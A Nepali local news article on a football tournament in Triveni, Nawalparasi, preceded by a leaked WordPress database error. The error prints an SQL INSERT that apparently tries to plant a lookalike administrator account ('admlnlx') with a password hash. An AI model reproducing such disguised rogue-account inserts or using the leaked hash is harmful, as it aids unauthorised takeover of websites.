WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BT7u.cHZFifZJX2nxaF68uRy0fMGUc/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:17:33', '', 'admlnlx', 'admlnlx')
रबिन्द्र यादव,
नवलपरासी माघ १-
नवलपरासीको त्रिवेणीसुस्तामा क्षेत्र स्तरीय फुटबल प्रतियोगिता शुरु भएको छ । खेलमैदान निर्माण समिति त्रिवेणीको आयोजना तथा स्थानिय कालिका युवा क्लबको व्यवस्थापनमा सो त्रिवेणी खेल मैदानको उद्घाटन गरि फुटबल प्रतियोगिता शुरु भएको हो ।
राष्ट्र र स्वास्थ्यका लागि खेलकुद नाराका साथ आयोजित प्रतियोगितामा जिल्लाका विभिन्न क्षेत्रबाट गरि कुल १६ वटा टिम सहभागि भएको खेलमैदान निर्माण समितिका अध्यक्ष ज्ञान प्रसाद पाठक (सन्तोष) ले बताउनु भयो । पाठकका अनुसार प्रतियोगिता प्रथम हुने टिमलाई नगद रु १५ हजार पुरस्कार सहित मेडल र प्रमाणपत्र पुरस्कार वितरण गरिने छ भने प्रतियोगितामा दित्तिय हुने टिमलाई मेडल र प्रमाणपत्र सहित नगद रु १० हजार पुरस्कार वितरण गरिने जानकारी दिनु भयो । सात दिन चल्ने कडा प्रतिष्पर्धात्मक फुटबल प्रतियोगितामा जिल्लाका विभिन्न क्षेत्रबाट दर्शकहरुको भिडभाड रहेको छ ।
खेल मैदान तथा प्रतियोगिताको उद्दघाटन कार्यक्रमका अध्यक्ष ज्ञान प्रसाद पाठक, प्रमुख अतिथि एवं शसस्त्र प्रहरी बरिष्ठ उपरिक्षक गोविन्द्र क्षेत्री, विशिष्ट अतिथि एवं जिल्ला खेलकुद विकास समितिका अध्यक्ष कुमार आले, अतिथि त्रिवेणी गाविस सचिव बेल प्रसाद भण्डारी, कुडिया गाविस सचिव सुरेन्द्र प्रसाद बस्याल, नेकपा एमालेका क्षेत्र नं. ६ का क्षेत्रिय अध्यक्ष रामप्रसाद अर्याल, युवा संघका जिल्ला उपाध्यक्ष युवराज डुम्रे, युवा संघका क्षेत्र नं. ६का क्षेत्रिय सचिव ईश्वर प्रसाद उपाध्याय, युवा संघ जिल्ला सदस्य सागर मणि पाण्डेय, सदस्य निर्मल पाण्डेय, युवा संघ कुडिया गाविस कमेटी अध्यक्ष असलम अंसारी, सचिव प्रमोद कुमार थापा लगायतले मन्तब्य राख्नु भएका थिए ।